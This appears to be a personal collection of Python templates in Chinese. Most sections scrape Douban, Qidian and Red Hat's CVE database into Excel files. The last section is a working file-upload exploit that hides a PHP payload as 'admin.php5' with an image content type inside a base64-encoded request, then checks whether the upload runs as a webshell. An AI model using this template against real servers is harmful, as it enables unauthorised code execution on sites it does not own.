1. for 循环控制URL变化
urls = [
f'https://movie.douban.com/top250?start={i}'
for i in range(0,101,25)
]
2. xpath爬取信息
res = requests.get(url=url,headers=headers)
e = etree.HTML(res.text)
name = e.xpath('//*[@id="content"]/div/div[1]/ol/li/div/div/div/a/span[1]/text()')
author = e.xpath('//*[@id="content"]/div/div[1]/ol/li/div/div[2]/div[2]/p[1]/text()[1]')
3. 提取json数据:
res = requests.get(url = url,headers=headers,verify=False)
json_data = res.json()
try:
for i in range(len(json_data['field_cve_releases_txt']['und'][0]['object'])):
score += [json_data['field_cve_cvss3_base_score']['und'][0]['value']]
print(score)
4. redhat爬虫:
import xlsxwriter
import pandas as pd
import requests
import re
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36'
}
cve_urls = []
cve_ids = []
severitys=[]
packages=[]
cveId=[]
score=[]
description=[]
def get_cve_info(cve):
"""
2.访问https://access.redhat.com/security/cve/ + CVE信息
获取详细的CVE信息(漏洞描述,严重等级,分数,危害程度等等)
:return:
"""
global severitys, packages, cveId, score,description
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36'
}
url_1 = 'https://access.redhat.com/api/redhat_node/'
url = url_1 + cve + '.json'
print('#'*60)
print(url)
time.sleep(1)
res = requests.get(url = url,headers=headers,verify=False)
json_data = res.json()
try:
for i in range(len(json_data['field_cve_releases_txt']['und'][0]['object'])):
if (bool([json_data['title']] and [json_data['field_cve_cvss3_base_score']['und'][0]['value']] and [json_data['field_cve_threat_severity_text']['und'][0]['value']] and [json_data['field_cve_releases_txt']['und'][0]['object'][i]['package']] and [json_data['field_cve_details_text']['und'][0]['value']])):
if [json_data['field_cve_releases_txt']['und'][0]['object'][i]['product']] == ['Red Hat Enterprise Linux 8']:
cveId += [json_data['title']]
print(cveId)
score += [json_data['field_cve_cvss3_base_score']['und'][0]['value']]
print(score)
severitys += [json_data['field_cve_threat_severity_text']['und'][0]['value']]
print(severitys)
packages += [json_data['field_cve_releases_txt']['und'][0]['object'][i]['package']]
print(packages)
description += [json_data['field_cve_details_text']['und'][0]['value']]
else:
continue
except:
print(f"This {cve} Error!")
with open('Error.txt', 'a') as f:
f.write(cve+'\n')
cveId.append(cve)
score.append("Error")
severitys.append("Error")
packages.append("Error")
description.append("Error")
else:
print("Success!")
def get_cve_id():
"""
1. 从Red Hat CVE Database 中爬取具体的CVE号
(1)首先通过JSON数据获取CVE对应的链接
(2)再通过正则表达式提取出具体的CVE号
注意: 每次重新爬取时候只需要修改urls中p的范围即可!
:return:
"""
global cve_ids,cve_urls
urls = [
f"https://access.redhat.com/hydra/rest/search/kcs?facet=true&facet.field=cve_threatSeverity&facet.mincount=1&facet.range=%7B!ex%3Date%7Dcve_publicDate&facet.range.end=NOW&facet.range.gap=%2B1YEAR&facet.range.start=NOW%2FYEAR-15YEARS&fl=id,cve_threatSeverity,cve_publicDate,view_uri,allTitle,cve_details&fq=documentKind:(%22Cve%22)&hl=true&hl.fl=abstract&hl.simple.post=%253C%252Fmark%253E&hl.simple.pre=%253Cmark%253E&p={p}&q=*:*&rows=10&sort=cve_publicDate+desc&start={(p-1)*10}"
for p in range(1,6)
]
for url in urls:
print(url)
res = requests.get(url=url, headers=headers,verify=False)
json_data = res.json()
cve_urls = json_data['highlighting']
for i in cve_urls:
cve_ids = re.findall(".*cve/(.*).*", i)
for j in cve_ids:
print(j)
get_cve_info(j)
def write_xlsx():
workbook = xlsxwriter.Workbook('redhat_{}.xlsx'.format('8.17'))
worksheet = workbook.add_worksheet('sheet1')
headings = ['CVE','描述','CVSS分数','严重等级','组件']
worksheet.write_row('A1', headings)
worksheet.write_column('A2', cveId)
worksheet.write_column('B2', description)
worksheet.write_column('C2', score)
worksheet.write_column('D2', severitys)
worksheet.write_column('E2', packages)
workbook.close()
del_same()
def del_same():
data = pd.DataFrame(pd.read_excel('/home/nx/PycharmProjects/untitled/redhat_8.17.xlsx', 'sheet1', engine="openpyxl"))
print('*' * 40)
re_row = data.duplicated()
print('*' * 40)
no_re_row = data.drop_duplicates()
print(no_re_row)
no_re_row.to_excel('redhat_8.17_del.xlsx')
if __name__ == '__main__':
get_cve_id()
write_xlsx()
5. xpath模板
from lxml import etree
import requests
import xlsxwriter
names = []
authors = []
def paqu():
global names, authors
url = "https://www.qidian.com/rank/recom?page=2"
headers={
'User-Agent':'self-defind-user-agent',
'Cookie':'name=self-define-cookies-in header'
}
response = requests.get(url,headers = headers)
e = etree.HTML(response.text)
names = e.xpath('//h4/a/text()')
authors = e.xpath('//p/a[@class="name"]/text()')
for num in range(len(names)):
print(names[num],":",authors[num])
return names
def write_xlsx():
workbook = xlsxwriter.Workbook('shuju.xlsx')
worksheet = workbook.add_worksheet('sheet1')
headings = ['小说名', ' 作者']
worksheet.write_row('A1', headings)
worksheet.write_column('A2', names )
worksheet.write_column('B2', authors)
workbook.close()
paqu()
6. POST包传递模板:
import base64
import requests
headers = {
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0',
'Content-Type': 'multipart/form-data; boundary=---------------------------225704804512407048061351782404'
}
def upload_exp():
proxies = {'http': 'http://localhost:8080', 'https': 'http://localhost:8080'}
url_upload = "http://xx.xx.xx.xx:41672/upload.php"
data = base64.b64decode("T3JpZ2luOiBodHRwOi8vMjE5LjE1My40OS4yMjg6NDE2NzIKQ29ubmVjdGlvbjogY2xvc2UKUmVmZXJlcjogaHR0cDovLzIxOS4xNTMuNDkuMjI4OjQxNjcyLwpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTIyNTcwNDgwNDUxMjQwNzA0ODA2MTM1MTc4MjQwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InVwZmlsZSI7IGZpbGVuYW1lPSJhZG1pbi5waHA1IgpDb250ZW50LVR5cGU6IGltYWdlL3BuZwoKPD9waHAgcGhwaW5mbygpOz8+Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMjI1NzA0ODA0NTEyNDA3MDQ4MDYxMzUxNzgyNDA0CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic3VibWl0IgoKw4PCpMOCwrjDgsKKw4PCpMOCwrzDgsKgw4PCpsOCwpbDgsKHw4PCpMOCwrvDgsK2Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMjI1NzA0ODA0NTEyNDA3MDQ4MDYxMzUxNzgyNDA0LS0K")
try:
res_1 = requests.post(url=url_upload,headers=headers,data=data,verify=False,timeout=10,proxies=proxies)
url_check = "http://xx.xx.xx.xx/uploads/admin.php5"
res_2 = requests.get(url=url_check,headers=headers)
if "phpinfo" in res_2.text :
print("一句话上传成功!")
else :
print("上传失败!")
except:
print("upload error!")
if __name__ == '__main__':
upload_exp()
|